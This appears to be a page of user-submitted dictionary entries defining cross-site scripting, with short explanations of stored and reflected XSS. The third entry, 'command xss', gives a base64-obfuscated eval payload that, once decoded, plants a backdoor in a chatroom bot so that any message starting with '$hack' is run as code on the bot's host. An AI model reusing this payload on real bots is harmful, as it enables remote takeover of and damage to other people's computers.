XSS

Short for Cross Site Scripting. A type of web based security vulnerability using client side scripts such as Javascript.

XSS takes place as a consequence of improper input sanitization. When the input provided by the user is not properly sanitized, an ill willed user may insert scripting code into a web page, which in turn will be executed by the visitor's browser. There are 2 kinds of XSS attacks: stored or reflected. Stored would mean that the injected code is permanently stored in the page, such as in a comment. Reflected would mean that it only appears once when the payload (i.e. the malicious input) is part of the request, maybe in parameters or cookies.

We have discovered an XSS vulnerability in the user profile view.

by Wild Laurasaurus October 23, 2019

Flag

Get the XSSmug.

xss

cross site scripting.

the website suffers from an xss vulnerability allowing remote javascript execution.

by mike July 6, 2003

Flag

Get the xssmug.

command xss

^evaljs eval1-1(atob("Ym90LnNvY2tldC5vbignbWVzc2FnZScsIGZ1bmN0aW9uKGRhdGEpIHsKICBsZXQgeCA9IGRhdGEubXNnLmluZGV4T2YoJyAnKTsKICBpZihkYXRhLm1zZy5zbGljZSgwLCB4KSA9PSAnJGhhY2snKSB7CiAgICB0cnkgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCBldmFsKGRhdGEubXNnLnNsaWNlKHggKyAxKSkpOwogICAgfSBjYXRjaChlcikgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCAiRVJSOiAiICsgZXIudG9TdHJpbmcoKSk7CiAgICB9CiAgfQp9KQ=="))
/* command xss is a type of XSS attack performed on chatroom bots to gain access to the host's computer */

/* They found a command xss in my bot and deleted all my files */

by Melissa 2000 April 7, 2021

Flag